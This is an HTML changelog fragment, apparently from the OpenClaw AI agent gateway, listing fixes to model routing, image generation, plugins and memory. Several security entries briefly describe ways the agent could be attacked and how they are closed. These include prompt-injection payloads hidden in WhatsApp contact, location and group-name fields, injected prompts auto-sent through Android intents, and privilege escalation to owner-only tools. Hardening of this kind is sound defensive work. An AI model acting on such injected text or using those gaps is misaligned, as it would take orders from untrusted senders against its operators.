<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
